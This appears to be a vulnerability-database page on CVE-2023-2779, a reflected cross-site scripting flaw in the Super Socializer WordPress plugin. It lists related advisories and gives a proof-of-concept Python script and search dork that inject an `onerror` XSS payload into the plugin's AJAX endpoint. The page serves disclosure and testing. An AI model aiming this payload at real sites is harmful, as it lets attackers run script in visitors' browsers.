Super Socializer 7.13.52 - Reflected XSS Exploit detected in WordPress plugi
Reporter | Title | Published | Views | Family All 10 |
---|---|---|---|---|
Packet Storm | WordPress Super Socializer 7.13.52 Cross Site Scripting | 21 Jun 202300:00 | – | packetstorm |
Exploit DB | Super Socializer 7.13.52 - Reflected XSS | 20 Jun 202300:00 | – | exploitdb |
CVE | CVE-2023-2779 | 19 Jun 202311:15 | – | cve |
NVD | CVE-2023-2779 | 19 Jun 202311:15 | – | nvd |
Cvelist | CVE-2023-2779 Super Socializer < 7.13.52 - Reflected XSS | 19 Jun 202310:52 | – | cvelist |
Patchstack | WordPress Super Socializer Plugin < 7.13.52 is vulnerable to Cross Site Scripting (XSS) | 19 Jun 202300:00 | – | patchstack |
Vulnrichment | CVE-2023-2779 Super Socializer < 7.13.52 - Reflected XSS | 19 Jun 202310:52 | – | vulnrichment |
Nuclei | Super Socializer < 7.13.52 - Cross-Site Scripting | 17 Oct 202307:20 | – | nuclei |
Prion | Cross site scripting | 19 Jun 202311:15 | – | prion |
Wordfence Blog | Wordfence Intelligence Weekly WordPress Vulnerability Report (May 29, 2023 to June 4, 2023) | 8 Jun 202313:39 | – | wordfence |
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779
import requests
# The URL of the vulnerable AJAX endpoint
url = "https://example.com/wp-admin/admin-ajax.php"
# The vulnerable parameter that is not properly sanitized and escaped
vulnerable_param = "<img src=x onerror=alert(document.domain)>"
# The payload that exploits the vulnerability
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}
# Send a POST request to the vulnerable endpoint with the payload
response = requests.post(url, data=payload)
# Check if the payload was executed by searching for the injected script tag
if "<img src=x onerror=alert(document.domain)>" in response.text:
print("Vulnerability successfully exploited")
else:
print("Vulnerability not exploitable")
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo